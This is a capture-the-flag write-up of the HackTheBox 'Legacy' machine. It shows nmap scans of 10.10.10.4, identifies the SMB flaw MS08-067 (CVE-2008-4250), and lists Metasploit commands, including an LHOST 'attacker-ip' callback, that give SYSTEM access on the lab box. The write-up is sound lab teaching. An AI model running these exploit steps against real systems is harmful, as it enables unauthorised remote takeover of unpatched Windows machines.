Hands-On Windows SMB Exploitation: Unleashing the Legacy CTF Challenge

Legacy

Legacy is a fairly straightforward beginner-level machine which demonstrates the potential security risks of SMB on Windows.

HackTheBox Logo

HackTheBox

Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.

Behind Security main logo, cropped.

BEHIND SECURITY

Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.

Service Enumeration

Behind Security performed an nmap scan on 10.10.10.4 and was able to identify that TCP ports 135, 139, and 445 are open.

Command: nmap -sV -sC -T4 10.10.10.4 -v -Pn

It is important to note the presence of the flag -Pn, indicating that nmap will not check if the host is up. This is particularly useful in this case, as the target machine is not responding to ICMP requests.

SMB Enumeration

Behind Security conducted an Nmap scan with specific vulnerability detection scripts from NSE (Nmap Scripting Engine). The command used for the scan was: nmap -sV –script=vuln -T4 10.10.10.4 -p135,139,445 -v -Pn, and the results are provided below.

The output tells Behind Security that the SMB server is vulnerable to ms08-067 Remote Code Execution (RCE).

Initial Access – Remote Code Execution (CVE-2008-4250)

Vulnerability Explanation: The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit. The vulnerability was addressed as CVE-2008-4250 and more information can be found here.

Vulnerability Fix: Microsoft has released a patch to fix this known issue. You can see more information here.

Severity: Critical

Steps to Reproduce the Attack: There is a metasploit module publicly available to explore the vulnerability.

msf6> use exploit/windows/smb/ms08_067_netapi
msf6> set RHOSTS 10.10.10.4
msf6> set LHOST attacker-ip
msf6> set TARGET 6
msf6> run


Screenshot:

Post-Exploitation

The SMB server is running as SYSTEM, and a successful exploit would result in a remote attacker gaining administrative privileges on the machine.

Proof of Exploitation: REDACTED user.txt
Proof of Exploitation: REDACTED root.txt
Scroll to Top